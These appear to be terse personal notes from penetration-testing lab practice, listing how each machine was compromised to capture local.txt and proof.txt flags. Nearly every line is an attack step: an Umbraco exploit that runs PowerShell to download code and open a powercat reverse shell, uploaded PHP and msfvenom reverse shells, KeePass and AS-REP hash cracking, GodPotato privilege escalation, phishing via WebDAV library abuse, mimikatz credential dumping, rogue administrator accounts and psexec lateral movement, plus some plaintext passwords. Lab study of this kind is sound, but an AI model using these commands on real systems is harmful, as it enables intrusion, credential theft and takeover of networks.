anonymous ftp available, but no contents apache cve2021-41773 working tried to get id_rsa of users but no luck got id_ecdsa of anita cracked using john passphrase fireball got the shell found local.txt privsec using found proof.txt
loggedin with anita private key found local.txt using ss found listening on localhost:8000 ssh -L 9090:localhost:8000 -i id_ecdsa [email protected] -p 2222 did ssh tunneling accessed internal website using found backend with view parameter searched for writeable directories found /dev/shm uploaded php reverse shell got reverse connection sudo -l showing nopasswd all sudo su got proof.txt
ftp server running on 14020 web server running on 14080 find direct exploit for umbraco python3 -u [email protected] -p OathDeeplyReprieve91 -i '' -c powershell.exe -a "-NoProfile -Command IEX(New-Object System.Net.WebClient).DownloadString(''); powercat -c -p 443 -e powershell" local.txt not found seimpersonate privilege available printspoofer not working godpotato worked proof.txt found
smb server running accessed smb using smbclient // -U guest found database.kdbx file converted to keepass2john Database.kdbx > keepasshash.txt cracked password using john --wordlist=/usr/share/wordlists/rockyou.txt keepasshash.txt found emma password in keepass logge in rdp with emma found local.txt found a exe in C: for dll hijacking but rabbithole ran Get-Childitem -path env: appkey !8@aBRBYdb3! open admin cmd with mark and above password got proof.txt
gobuster on port 80 and 8000 nothing on port 80 except aspnet_client/system_web on port 8000 rite cms found /cms/admin.php with default credentials uploaded php reverse shell from got reverse shell found local.txt seimpersonate privilege available used godpotato found proof.txt unable to run mimikatz added a new user to administrator and rdp group got rdp with new user from git head found email id and password and a additional email id
crackmapexec smb -u user.txt -p pass.txt --continue-on-success found maildmz as valid user with password detailed steps for windows library abuse using phishing mail in assembling the pieces
mkdir /home/kali/beyond/webdav
/home/kali/.local/bin/wsgidav --host= --port=80 --auth=anonymous --root /home/kali/beyond/webdav/
sent phishing mail to [email protected] got reverse shell from found local.txt
got reverse shell after sending email using 189 found local.txt found Database.kdbx transferred to kali using impacket-smbserver -smb2support test . copy scheduler.exe \\test\scheduler.exe found password of [email protected] and dmzadmin also permissions to access c:\users\offsec found proof.txt on desktop got stuck now, no share access available, no evilwinrm, no password spraying working
turned to asreproasting using rubeus, found michelle user hash, cracked using hashcat sudo hashcat -m 18200 hashes.asreproast2 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
logged into rdp with dmzadmin got adminitstrator access found proof.txt connected to internal network using ligolo
logged in with michelle user found local.txt found scheduler.exe in C: running as a administrator service use customlib.dll but no permission to replace exe or dll use one more beyondhelper.dll. created and copied in same directory created new user and cmd as .\dave2 found proof.txt ran mimikatz found plain text password of andrea
logged in with andrea user, found local.txt
update collector folder in C:
schedule.ps1 in C:\ with misspelled updatecollctor.exe
scheduled to runas milana
created msfvenom shell and saved as uploadcollctor
got reverse shell found proof.txt
have impersonate and debug privilege
found hash of milana
in documents found databse.kdbx
in db found ssh key of sarah
tried on 19
logged in with ssh key of sarah found local.txt sudo -l borg command used extract to stdout with borg found password of linux 20 and hash of amy su amy sudo su found proof.txt
ssh using andrew password found on 19 found local.txt ssh -L 80: [email protected]
started apache service using service apache24 onestatus got reverse shell as www user can read history file of mount user found password of mountuser from history, was used on 21
accessed 21 share from 191 using mountuser credentials, found password of administrator enter-pssession for 21 from 191 all other machine using ps session with dom admin
converted password to ntlm and used impacket-psexec